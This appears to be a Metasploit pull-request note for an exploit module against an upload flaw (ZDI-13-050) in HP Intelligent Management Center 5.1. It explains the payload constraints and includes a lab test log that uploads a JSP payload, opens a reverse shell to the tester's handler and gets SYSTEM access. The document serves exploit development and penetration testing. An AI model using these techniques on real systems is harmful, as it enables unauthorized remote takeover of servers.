Added module for ZDI-13-050

[jvazquez-r7]

Tested successfully on HP Intelligent Management Center 5.1 E0202 over windows 2003 sp2.

Native and java platforms payloads aren't used because of the handling of new lines on the vuln application. Also there is a max upload length of 40k by default.

No compression, only archiving, is used to avoid exceptions when the Java vuln app decompress the zip created with rex/zip => Errors on entry sizes and crc32.

On the other side the AutoDeploy on the tomcat webapp server doesn't work.

Test:

msf exploit(hp_imc_mibfileupload) > check
[*] The target service is running, but could not be validated.
msf exploit(hp_imc_mibfileupload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.130:8080 - Uploading the JSP payload...
[*] 192.168.1.130:8080 - JSP payload uploaded successfully
[*] 192.168.1.130:8080 - Executing payload...
[*] Command shell session 3 opened (192.168.1.129:4444 -> 192.168.1.130:3798) at 2013-03-25 00:51:46 +0100
[+] Deleted 6GpaBU.jsp

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\iMC\client\bin>echo 955363237;echo GCVgyHlZjaPADQdKEfONZLmbfNQYsWQN
955363237;echo GCVgyHlZjaPADQdKEfONZLmbfNQYsWQN

C:\Program Files\iMC\client\bin>attrib.exe -r "6GpaBU.jsp" ; del.exe /f /q "6GpaBU.jsp" ; rm -f "6GpaBU.jsp" >/dev/null;echo OiiaXovNDoTNZZYvmdhhuWOCFYoDdWai

C:\Program Files\iMC\client\bin>whoami
whoami
nt authority\system

C:\Program Files\iMC\client\bin>exit
exit

[*] 192.168.1.130 - Command shell session 3 closed.  Reason: Died from EOFError
^C
Abort session 3? [y/N]  y